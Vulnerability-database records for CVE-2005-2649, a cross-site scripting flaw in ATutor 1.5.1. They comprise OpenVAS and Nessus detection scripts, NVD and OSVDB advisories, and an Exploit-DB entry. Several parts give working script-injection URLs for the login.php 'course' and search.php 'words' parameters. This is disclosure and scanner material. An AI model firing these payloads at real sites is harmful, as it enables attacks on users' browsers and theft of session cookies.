{"id": "OPENVAS:136141256231019587", "type": "openvas", "bulletinFamily": "scanner", "title": "ATutor Cross Site Scripting Vulnerability", "description": "The remote version of ATutor is prone to cross-site scripting\n attacks due to its failure to sanitize user-supplied input.", "published": "2006-03-26T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231019587", "reporter": "Copyright (C) 2005 Josh Zlatin-Amishav", "references": ["18842", "18843", "http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html", "http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html"], "cvelist": ["CVE-2005-2649"], "lastseen": "2020-05-12T15:08:25", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-18842", "CVE-2017-18842", "CVE-2018-18843", "CVE-2018-18842", "CVE-2005-2649", "CVE-2017-18843"]}, {"type": "exploitdb", "idList": ["EDB-ID:18842", "EDB-ID:26170", "EDB-ID:18843"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_1033750FCAB411D99AED000E0C2E438A.NASL", "ATUTOR_XSS.NASL", "FREEBSD_PKG_0FF0E9A64EE011D9A9E70001020EED82.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:18842", "OSVDB:18843"]}, {"type": "xssed", "idList": ["XSSED:18842"]}, {"type": "hackerone", "idList": ["H1:18843"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18843", "SECURITYVULNS:DOC:18842"]}, {"type": "seebug", "idList": ["SSV:18843", "SSV:18842"]}, {"type": "zdt", "idList": ["1337DAY-ID-18842", "1337DAY-ID-18843"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18843"]}, {"type": "myhack58", "idList": ["MYHACK58:62200818843"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-18843"]}], "modified": "2020-05-12T15:08:25", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-05-12T15:08:25", "rev": 2}, "vulnersScore": 6.0}, "pluginID": "136141256231019587", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ATutor Cross Site Scripting Vulnerability\n#\n# Authors:\n# Josh Zlatin-Amishav <josh at ramat doti cc>\n#\n# Copyright:\n# Copyright (C) 2005 Josh Zlatin-Amishav\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:atutor:atutor\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.19587\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)\");\n script_cve_id(\"CVE-2005-2649\");\n script_bugtraq_id(14598);\n script_xref(name:\"OSVDB\", value:\"18842\");\n script_xref(name:\"OSVDB\", value:\"18843\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_name(\"ATutor Cross Site Scripting Vulnerability\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2005 Josh Zlatin-Amishav\");\n script_dependencies(\"gb_atutor_detect.nasl\", \"cross_site_scripting.nasl\");\n script_mandatory_keys(\"atutor/detected\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html\");\n script_xref(name:\"URL\", value:\"http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the\n disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to\n upgrade to a newer release, disable respective features, remove the product or replace the product by another\n one.\");\n\n script_tag(name:\"summary\", value:\"The remote version of ATutor is prone to cross-site scripting\n attacks due to its failure to sanitize user-supplied input.\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"url_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nvtstrings = get_vt_strings();\nxss = \"<script>alert(\" + vtstrings[\"lowercase_rand\"] + \")</script>\";\n# nb: the url-encoded version is what we need to pass in.\nexss = urlencode( str:xss );\n\nhost = http_host_name( port:port );\n\nif( http_get_has_generic_xss( port:port, host:host ) ) exit( 0 );\n\nurl = dir + '/login.php?course=\">' + exss;\n\nreq = http_get( item:url, port:port );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( res =~ \"^HTTP/1\\.[01] 200\" && xss >< res &&\n egrep( string:res, pattern:\"Web site engine's code is copyright .+ href=.http://www\\.atutor\\.ca\" ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 0 );\n", "naslFamily": "Web application abuses"}

{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "Cross-site scripting (XSS) vulnerability in ATutor 1.5.1 allows remote attackers to inject arbitrary web script or HTML via (1) course parameter in login.php or (2) words parameter in search.php.", "edition": 3, "cvss3": {}, "published": "2005-08-23T04:00:00", "title": "CVE-2005-2649", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2649"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:adaptive_technology_resource_centre:atutor:1.5.1"], "id": "CVE-2005-2649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2649", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:adaptive_technology_resource_centre:atutor:1.5.1:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:15", "bulletinFamily": "software", "cvelist": ["CVE-2005-2649"], "edition": 1, "description": "## Vulnerability Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'course' variable upon submission to the 'login.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, the Adaptive Technology Resource Centre has released a patch to address this vulnerability.\n## Short Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'course' variable upon submission to the 'login.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/tour/login.php?course=\"><script>alert('Matrix_Killer r0X');</script>\n## References:\nVendor URL: http://www.atutor.ca/\nSecurity Tracker: 1014731\n[Secunia Advisory ID:16496](https://secuniaresearch.flexerasoftware.com/advisories/16496/)\n[Related OSVDB ID: 18843](https://vulners.com/osvdb/OSVDB:18843)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html\nISS X-Force ID: 21910\n[CVE-2005-2649](https://vulners.com/cve/CVE-2005-2649)\nBugtraq ID: 14598\n", "modified": "2005-08-18T05:36:23", "published": "2005-08-18T05:36:23", "href": "https://vulners.com/osvdb/OSVDB:18842", "id": "OSVDB:18842", "type": "osvdb", "title": "ATutor login.php course Variable XSS", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:15", "bulletinFamily": "software", "cvelist": ["CVE-2005-2649"], "edition": 1, "description": "## Vulnerability Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'words' variable upon submission to the 'search.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, the Adaptive Technology Resource Centre has released a patch to address this vulnerability.\n## Short Description\nATutor contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'words' variable upon submission to the 'search.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/tour/search.php?search=1&search=1&words=\"><script>alert('There is no other place like 127.0.0.1');</script>&include=all&find_in=all&display_as=pages\n\nhttp://[target]/tour/search.php?search=1&words=\"><script>alert('Found By matrix_killer');</script>&include=all&find_in=all&display_as=pages&submit=Search\n## References:\nVendor URL: http://www.atutor.ca/\nSecurity Tracker: 1014731\n[Secunia Advisory ID:16496](https://secuniaresearch.flexerasoftware.com/advisories/16496/)\n[Related OSVDB ID: 18842](https://vulners.com/osvdb/OSVDB:18842)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-08/0261.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0600.html\nISS X-Force ID: 21910\n[CVE-2005-2649](https://vulners.com/cve/CVE-2005-2649)\nBugtraq ID: 14598\n", "modified": "2005-08-18T05:36:23", "published": "2005-08-18T05:36:23", "href": "https://vulners.com/osvdb/OSVDB:18843", "id": "OSVDB:18843", "type": "osvdb", "title": "ATutor search.php words Variable XSS", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T03:00:06", "description": "ATutor 1.5.1 login.php course Parameter XSS. CVE-2005-2649. Webapps exploit for php platform", "published": "2005-08-18T00:00:00", "type": "exploitdb", "title": "ATutor 1.5.1 login.php course Parameter XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2649"], "modified": "2005-08-18T00:00:00", "id": "EDB-ID:26170", "href": "https://www.exploit-db.com/exploits/26170/", "sourceData": "source: http://www.securityfocus.com/bid/14598/info\r\n\r\nATutor is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. \r\n\r\nhttp://www.example.com/tour/login.php?course=\"><script>alert('XSS');</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/26170/"}], "nessus": [{"lastseen": "2021-01-20T09:25:07", "description": "The remote host is running ATutor, a CMS written in PHP. \n\nThe remote version of this software is prone to cross-site scripting \nattacks due to its failure to sanitize user-supplied input.", "edition": 20, "published": "2005-09-06T00:00:00", "title": "ATutor 1.5.1 Multiple Script XSS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2649"], "modified": "2005-09-06T00:00:00", "cpe": ["cpe:/a:adaptive_technology_resource_centre:atutorv"], "id": "ATUTOR_XSS.NASL", "href": "https://www.tenable.com/plugins/nessus/19587", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Josh Zlatin-Amishav <josh at ramat doti cc>\n#\n# This script is released under the GNU GPLv2\n\n# Changes by Tenable:\n# - Revised plugin title (4/28/09)\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(19587);\n script_version(\"1.23\");\n script_cve_id(\"CVE-2005-2649\");\n script_bugtraq_id(14598);\n\n script_name(english:\"ATutor 1.5.1 Multiple Script XSS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is vulnerable to a\ncross-site scripting issue.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running ATutor, a CMS written in PHP. \n\nThe remote version of this software is prone to cross-site scripting \nattacks due to its failure to sanitize user-supplied input.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2005/Aug/259\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2005/Aug/598\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/09/06\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/08/18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adaptive_technology_resource_centre:atutorv\");\nscript_end_attributes();\n\n\n script_summary(english:\"Checks for XSS in login.php\");\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n script_copyright(english:\"Copyright (C) 2005-2021 Josh Zlatin-Amishav\");\n script_dependencies(\"http_version.nasl\", \"cross_site_scripting.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\nif(!get_port_state(port))exit(0);\nif(!can_host_php(port:port)) exit(0);\nif ( get_kb_item(\"www/\"+port+\"/generic_xss\") ) exit(0);\n\n# A simple alert.\nxss = \"<script>alert(\" + SCRIPT_NAME + \")</script>\";\n# nb: the url-encoded version is what we need to pass in.\nexss = urlencode(str:xss);\n\nforeach dir ( cgi_dirs() )\n{\n req = http_get(\n item:string(\n dir, \"/login.php?\",\n 'course=\">', exss\n ), \n port:port\n );\n res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);\n\ndebug_print(\"res [\", res, \"].\");\n\n if (\n egrep(string:res, pattern:\"Web site engine's code is copyright .+ href=.http://www\\.atutor\\.ca\") &&\n xss >< res\n )\n {\n \tsecurity_warning(port);\n\t\tset_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n \texit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}